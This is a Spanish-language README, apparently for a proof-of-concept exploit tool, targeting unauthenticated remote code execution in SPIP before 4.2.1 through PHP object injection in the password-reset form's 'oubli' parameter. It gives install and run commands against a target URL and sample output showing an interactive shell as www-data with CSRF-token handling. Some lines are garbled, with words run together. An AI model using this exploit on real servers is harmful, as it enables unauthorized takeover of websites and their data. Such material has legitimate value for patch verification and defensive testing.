
Exploit de prueba de concepto para ejecución remota de código no autenticada en SPIP < 4.2.1 mediante inyección de objetos PHP en el formulario de restablecimiento de contraseña. Proporciona shell interactiva con manejo de tokens CSRF.
Vulnerabilidad de ejecución remota de código sin autenticación en SPIP anterior a 4.2.1. El parámetro
oublien el formulario de restablecimiento de contraseña es vulnerable a la inyección de objetos PHP debido a una deserialización mal gestionada. Una carga útil serializada especialmente diseñada se ejecuta en el servidor como el usuario web, y la salida se refleja en la respuesta dentro del valor del campo de entradaoubli.
/spip.php?page=spip_pass.oubli.value reflejado en la respuesta.python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests beautifulsoup4 prompt_toolkit
python3 exploit.py -u http://TARGET/spip
Ejemplo:
$ python3 exploit.py -u http://10.10.10.10/spip
[*] Fetching anti-CSRF token...
[*] Testing command execution...
[+] Target is vulnerable! Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.
Shell> whoami
www-data